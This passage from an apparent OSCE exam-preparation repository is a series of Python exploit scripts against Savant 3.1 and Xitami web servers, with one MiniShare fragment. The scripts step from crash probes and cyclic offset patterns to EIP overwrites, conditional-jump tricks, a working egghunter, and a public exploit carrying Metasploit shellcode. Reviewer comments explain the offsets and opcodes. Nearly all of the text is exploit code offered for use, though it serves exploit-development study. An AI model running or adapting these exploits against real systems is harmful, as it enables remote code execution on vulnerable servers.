#[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode] -- planned SEH layout for the final file; this script only writes the crash trigger 8 | 9 | f = open("users.txt",'w') # NOTE(review): a with-block would close the file even if write() raises 10 | f.write(buff) 11 | f.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/minishare-15575/users.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Egg Hunter BoF/minishare-15575/users.txt -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_carr_rocx.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | buffer2 = "R0cX" + "R0cX" + "\x41" * 992 # the egg: doubled "R0cX" tag followed by 992 bytes of 0x41 (inc ecx) standing in for shellcode; it is appended after the request terminator, so it lands wherever the server buffers trailing data 8 | 9 | badbuffer = "\xcc" # int3 marker: a breakpoint hit here shows the debugger where execution arrived 10 | badbuffer += "\x41" * (254 - len(badbuffer)) 11 | badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN -- only 3 bytes are sent; the high 0x00 of 0x00401D09 is presumably the terminator the server writes after the URI, so the address has to be the last thing in the buffer 12 | httpmethod = "\xb0\x03\x04\x01\x7B\x15" # MOV AL, 3; ADD AL, 1; JPO 15 -- AL ends up 4 (one set bit, PF=0) so JPO is always taken: a conditional opcode used as an unconditional forward jump; the displacement targets the in-memory copy of the request, so re-derive it in the debugger if the buffer changes (usable jcc opcodes were probed in savant_10434_crash_conditional_jump.py, the plain EB variant is in savant_10434_crash_eip_overwrite_short_25_jump.py) 13 | 14 | sendbuf = httpmethod + " /%" + 
badbuffer + '\r\n\r\n' + buffer2 15 | 16 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | connect=sock.connect((target_address,target_port)) 18 | sock.send(sendbuf) 19 | sock.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_a.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "\x41" * 258 8 | httpmethod = "GET" 9 | 10 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 11 | 12 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | connect=sock.connect((target_address,target_port)) 14 | sock.send(sendbuf) 15 | sock.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "A" * 254 8 | badbuffer += "\x42"*4 9 | httpmethod = "GET" 10 | 11 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 12 | 13 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | connect=sock.connect((target_address,target_port)) 15 | sock.send(sendbuf) 16 | sock.close() 17 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_b_00.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "A" * 254 8 | badbuffer += "\x42"*3 9 | httpmethod = "GET" 10 | 11 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 12 | 13 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | 
connect=sock.connect((target_address,target_port)) 15 | sock.send(sendbuf) 16 | sock.close() 17 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_conditional_jump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "\xcc" # int3 marker: a breakpoint hit here shows the debugger where execution arrived 8 | badbuffer += "\x41" * (254 - len(badbuffer)) 9 | badbuffer += "\x09\x1d\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn -- only 3 bytes are sent; the high 0x00 of 0x00401d09 is presumably the terminator the server writes after the URI, so nothing may follow the address inside the buffer 10 | httpmethod = "\x70\x71\x72\x73\x74\x75\x78\x79\x7A\x7B" # Test for working conditional jumps -- x86 decodes this as a chain of rel8 jcc, each opcode taking the following byte as its displacement (JO +0x71, JB +0x73, JE +0x75, JS +0x79, JP +0x7B), so which one fires depends on the flags on entry 11 | 12 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 13 | 14 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | connect=sock.connect((target_address,target_port)) # connect() returns None; the assignment is a no-op 16 | sock.send(sendbuf) # NOTE(review): sendall() would guard against a short write 17 | sock.close() 18 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_eip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5" # 258-byte Metasploit cyclic pattern, same length as the "A"*258 crash in savant_10434_crash_a.py; the 4 pattern bytes that land in EIP give the offset, which the later scripts fix at 254 8 | httpmethod = "GET" 9 | 10 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 11 | 12 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | connect=sock.connect((target_address,target_port)) # connect() returns None; the assignment is a no-op 14 | sock.send(sendbuf) 15 | sock.close() 16 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_eip_overwrite.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "A" * 254 8 | badbuffer += "\x09\x1d\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 9 | httpmethod = "\xcc" 10 | 11 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 12 | 13 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | connect=sock.connect((target_address,target_port)) 15 | sock.send(sendbuf) 16 | sock.close() 17 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_crash_eip_overwrite_short_25_jump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "A" * 254 8 | badbuffer += "\x09\x1d\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 9 | httpmethod = "\xEB\x19" # SHORT JUMP 0X19 10 | 11 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 12 | 13 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 14 | connect=sock.connect((target_address,target_port)) 15 | sock.send(sendbuf) 16 | sock.close() 17 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_egghunter_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | buffer2 = "R0cX" + "R0cX" + "\xcc" * 992 8 | 9 | badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX 10 | badbuffer += "\x90" * (254 - len(badbuffer)) 11 | badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN 12 | httpmethod = 
"\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14 13 | 14 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2 15 | 16 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | connect=sock.connect((target_address,target_port)) 18 | sock.send(sendbuf) 19 | sock.close() 20 | 21 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_10434_jmp_instructions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | target_address="172.16.73.130" 5 | target_port=80 6 | 7 | badbuffer = "\xcc" 8 | badbuffer += "\x41" * (254 - len(badbuffer)) 9 | badbuffer += "\x09\x1d\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 10 | httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14 11 | 12 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 13 | 14 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | connect=sock.connect((target_address,target_port)) 16 | sock.send(sendbuf) 17 | sock.close() 18 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_10434/savant_pub_exploit_10434.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Title: Savant web server 3.1 buffer overflow exploit 4 | #Version: 3.1 5 | #Tested on: win xp sp3 6 | #Vulnerability discovered by Muts(offensive security) 7 | #\x83\xc4\x50\x54\xc3 -add esp,50 push esp ret[see the double dance of this in exploit] 8 | #ret=00401D09[pop ebp, ret] 9 | 10 | 11 | import socket,sys 12 | # win calc.exe [metasploit] (172 byte) 13 | host = sys.argv[1] 14 | buff = ("\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" 15 | "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" 16 | "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" 17 | 
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" 18 | "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" 19 | "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" 20 | "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" 21 | "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" 22 | "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" 23 | "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" 24 | "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4") 25 | buff3 = "\x90" * 30 26 | buff2 = "\x90" * 53 27 | ret = "\x09\x1D\x40" #savant.exe 28 | buffr = '\x83\xC4\x50\x54\xc3 /' +buff2+buff3+buff+ret + '\r\n\r\n' 29 | print buffr 30 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | s.connect((host,80)) 32 | s.send(buffr) 33 | sys.exit() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "A"*258 14 | httpmethod = "GET" 15 | 16 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 17 | 18 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | connect=sock.connect((target_address, target_port)) 20 | sock.send(sendbuf) 21 | sock.close() 22 | 23 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_crash_cyclic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - 
Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5" 14 | httpmethod = "GET" 15 | 16 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 17 | 18 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | connect=sock.connect((target_address, target_port)) 20 | sock.send(sendbuf) 21 | sock.close() 22 | 23 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_crash_cyclic_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "A"*254 14 | badbuffer += "\x09\x1D\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 15 | httpmethod = "\xcc" 16 | 17 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 18 | 19 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 20 | connect=sock.connect((target_address, target_port)) 21 | sock.send(sendbuf) 22 | sock.close() 23 | 24 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_crash_cyclic_withb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 
| 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "A"*254 + "B"*4 14 | httpmethod = "GET" 15 | 16 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 17 | 18 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | connect=sock.connect((target_address, target_port)) 20 | sock.send(sendbuf) 21 | sock.close() 22 | 23 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_hunter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | buffer2 = "R0cX" + "R0cX" + "\xcc" * 992 14 | 15 | badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 16 | badbuffer += "\x90"*(254-len(badbuffer)) 17 | badbuffer += "\x09\x1D\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 18 | httpmethod = "\xb0\x03\x04\x01\x7B\x15" # MOV AL, 3; ADD AL, 1; JPO 15 19 | 20 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2 21 | 22 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | connect=sock.connect((target_address, target_port)) 24 | sock.send(sendbuf) 25 | sock.close() 26 | 27 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_jmp_around.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 
12 | 13 | badbuffer = "\xcc" 14 | badbuffer += "A"*(254-len(badbuffer)) 15 | badbuffer += "\x09\x1D\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 16 | httpmethod = "\xb0\x03\x04\x01\x7B\x15" # MOV AL, 3; ADD AL, 1; JPO 15 17 | 18 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 19 | 20 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | connect=sock.connect((target_address, target_port)) 22 | sock.send(sendbuf) 23 | sock.close() 24 | 25 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/savant_3.1_18401/savant_18401_short_jmp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | banner = """ 5 | #----------------------------------------------# 6 | Savant Exploit - Egghunter 7 | #----------------------------------------------# 8 | """ 9 | 10 | target_address="192.168.37.131" 11 | target_port=80 12 | 13 | badbuffer = "\xcc" 14 | badbuffer += "A"*(254-len(badbuffer)) 15 | badbuffer += "\x09\x1D\x40" # EIP overwrite 00401d09 savant.exe pop ebp, retn 16 | httpmethod = "\xeb\x19" 17 | 18 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' 19 | 20 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | connect=sock.connect((target_address, target_port)) 22 | sock.send(sendbuf) 23 | sock.close() 24 | 25 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import time 3 | import socket 4 | import sys 5 | 6 | if len(sys.argv) != 3: 7 | print "Usage: ./xitami.py " 8 | sys.exit(1) 9 | 10 | target = sys.argv[1] 11 | port = int(sys.argv[2]) 12 | 13 | buf = "A" * 100 14 | 15 | header = ( 16 | 'GET / HTTP/1.1\r\n' 17 | 'Host: %s\r\n' 18 | 'If-Modified-Since: pwned, %s\r\n' 19 | '\r\n') % (target, buf) 20 | 21 | s = 
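socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | try: 23 | s.connect((target, port)) 24 | print "[+] Connected" 25 | except socket.error: # was a bare except, which also swallowed KeyboardInterrupt/SystemExit 26 | print "[!] Connection Failed" 27 | sys.exit(1) # was exit(0): a failed connect must not report success to a calling shell 28 | 29 | print "[+] Sending payload..." 30 | s.sendall(header) # sendall() loops on short writes; send() may truncate silently 31 | time.sleep(1) 32 | s.close() 33 | 34 | print "[+] Check port 1337 for your shell" # crash probe only: nothing in this request spawns a shell 35 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_egghunt.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | # 32-byte int 0x2e egghunter: probes memory page by page with syscall 0x02, matches the 8-byte tag with two scasd, then jmp edi into whatever follows the tag (32-bit XP-era targets only) 12 | egghunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02" 13 | "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" 14 | "w00t" # 4 byte tag, doubled in memory as w00tw00t so the hunter's own copy is never taken for the egg 15 | "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") 16 | 17 | jump = "\xeb\x22" # jmp short +0x22: from offset 78 this lands at 112, inside the 50-byte NOP sled that precedes the egghunter at offset 128 18 | 19 | buf = "A" * 72 # 72 bytes to the saved return address (see xitami_eip.py / xitami_pattern.py) 20 | buf += "\xD7\x30\x9D\x7C" # jmp esp 0x7c9d30d7 / XP SP3 English -- noted as user32.dll here but as shell32.dll in the kolibri scripts; confirm the module with !mona jmp -r esp before relying on it 21 | buf += jump 22 | buf += "\x90" * 50 23 | buf += egghunt 24 | buf += "w00tw00t" # tag 25 | buf += "\x90" * 50 # placeholder: the shellcode goes here, directly after the tag 26 | 27 | header = ( 28 | 'GET / HTTP/1.1\r\n' 29 | 'Host: %s\r\n' 30 | 'If-Modified-Since: pwned, %s\r\n' 31 | '\r\n') % (target, buf) 32 | 33 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | try: 35 | s.connect((target, port)) 36 | print "[+] Connected" 37 | except socket.error: # narrow handler: a bare except also swallows KeyboardInterrupt/SystemExit 38 | print "[!] Connection Failed" 39 | sys.exit(1) # non-zero status so a wrapper can tell failure from success 40 | 41 | print "[+] Sending payload..." 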
42 | s.send(header) 43 | time.sleep(1) 44 | s.close() 45 | 46 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_eip.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | buf = "A" * 72 13 | buf += "B" * 4 14 | 15 | header = ( 16 | 'GET / HTTP/1.1\r\n' 17 | 'Host: %s\r\n' 18 | 'If-Modified-Since: pwned, %s\r\n' 19 | '\r\n') % (target, buf) 20 | 21 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | try: 23 | s.connect((target, port)) 24 | print "[+] Connected" 25 | except: 26 | print "[!] Connection Failed" 27 | sys.exit(0) 28 | 29 | print "[+] Sending payload..." 30 | s.send(header) 31 | time.sleep(1) 32 | s.close() 33 | 34 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_jmp.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | jump = "\xeb\x22" # short jump 13 | 14 | buf = "A" * 72 15 | buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English 16 | buf += jump 17 | buf += "\x90" * 50 18 | buf += "ABCD" 19 | 20 | header = ( 21 | 'GET / HTTP/1.1\r\n' 22 | 'Host: %s\r\n' 23 | 'If-Modified-Since: pwned, %s\r\n' 24 | '\r\n') % (target, buf) 25 | 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | try: 28 | s.connect((target, port)) 29 | print "[+] Connected" 30 | except: 31 | print "[!] 
Connection Failed" 32 | sys.exit(0) 33 | 34 | print "[+] Sending payload..." 35 | s.send(header) 36 | time.sleep(1) 37 | s.close() 38 | 39 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_pattern.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9" 13 | 14 | header = ( 15 | 'GET / HTTP/1.1\r\n' 16 | 'Host: %s\r\n' 17 | 'If-Modified-Since: pwned, %s\r\n' 18 | '\r\n') % (target, buf) 19 | 20 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | try: 22 | s.connect((target, port)) 23 | print "[+] Connected" 24 | except: 25 | print "[!] Connection Failed" 26 | sys.exit(0) 27 | 28 | print "[+] Sending payload..." 
29 | s.send(header) 30 | time.sleep(1) 31 | s.close() 32 | 33 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/1st/xitami_ppr.py: -------------------------------------------------------------------------------- 1 | import time 2 | import socket 3 | import sys 4 | 5 | if len(sys.argv) != 3: 6 | print "Usage: ./xitami.py " 7 | sys.exit(1) 8 | 9 | target = sys.argv[1] 10 | port = int(sys.argv[2]) 11 | 12 | buf = "A" * 72 13 | buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English 14 | buf += "\x90" * 50 15 | 16 | header = ( 17 | 'GET / HTTP/1.1\r\n' 18 | 'Host: %s\r\n' 19 | 'If-Modified-Since: pwned, %s\r\n' 20 | '\r\n') % (target, buf) 21 | 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | try: 24 | s.connect((target, port)) 25 | print "[+] Connected" 26 | except: 27 | print "[!] Connection Failed" 28 | sys.exit(0) 29 | 30 | print "[+] Sending payload..." 31 | s.send(header) 32 | time.sleep(1) 33 | s.close() 34 | 35 | print "[+] Check port 1337 for your shell" -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | buf = "A" * 72 + "B" * 4 20 | 21 | header = ( 22 | 'GET / HTTP/1.1\r\n' 23 | 'Host: %s\r\n' 24 | 'If-Modified-Since: pwned, %s\r\n' 25 | '\r\n') % (target, buf) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | s.connect((target, port)) 30 | print "[+] Connected" 31 
| except: 32 | print "[!] Connection Failed" 33 | sys.exit(0) 34 | 35 | print "[+] Sending payload..." 36 | s.send(header) 37 | time.sleep(1) 38 | s.close() 39 | 40 | print "[+] Check port 1337 for your shell" 41 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/back.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | #jmp esp 0x7c86467b in kernel32.dll 20 | 21 | buf = "A" * 72 + "\x7b\x46\x86\x7c" + "\xEB\x22" + "\x90" * 50 + "ABCD" 22 | 23 | header = ( 24 | 'GET / HTTP/1.1\r\n' 25 | 'Host: %s\r\n' 26 | 'If-Modified-Since: pwned, %s\r\n' 27 | '\r\n') % (target, buf) 28 | 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | try: 31 | s.connect((target, port)) 32 | print "[+] Connected" 33 | except: 34 | print "[!] Connection Failed" 35 | sys.exit(0) 36 | 37 | print "[+] Sending payload..." 
38 | s.send(header) 39 | time.sleep(1) 40 | s.close() 41 | 42 | print "[+] Check port 1337 for your shell" 43 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | buf = "A"*500 20 | 21 | header = ( 22 | 'GET / HTTP/1.1\r\n' 23 | 'Host: %s\r\n' 24 | 'If-Modified-Since: pwned, %s\r\n' 25 | '\r\n') % (target, buf) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | s.connect((target, port)) 30 | print "[+] Connected" 31 | except: 32 | print "[!] Connection Failed" 33 | sys.exit(0) 34 | 35 | print "[+] Sending payload..." 
